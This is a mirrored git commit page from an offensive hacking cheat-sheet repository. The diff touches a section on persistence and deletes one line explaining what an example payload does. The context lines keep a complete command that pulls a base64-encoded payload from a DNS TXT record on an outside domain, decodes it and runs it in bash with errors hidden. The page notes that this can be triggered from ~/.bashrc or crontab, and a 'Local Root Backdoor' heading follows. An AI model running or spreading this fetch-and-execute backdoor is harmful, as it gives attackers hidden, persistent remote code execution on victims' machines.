mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-05-27 09:42:25 +02:00
Update README.md
This commit is contained in:
@@ -1857,8 +1857,6 @@ Can also be triggered via `~/.bashrc` or the user's crontab. Use (example):
|
||||
# Use a "double bash" to redirect _also_ $()-subshell error to /dev/null:
|
||||
bash -c 'exec bash -c "{ $(dig +short b00m2.team-teso.net TXT|tr -d \ \"|base64 -d);}"'&>/dev/null
|
||||
```
|
||||
(the example payload creates `/tmp/.b00m` and notifies us via another DNS request to [interactsh](https://app.interactsh.com).
|
||||
|
||||
|
||||
<a id="ld-backdoor"></a>
|
||||
**6.vii. Local Root Backdoor**
|
||||
|
||||
Reference in New Issue
Block a user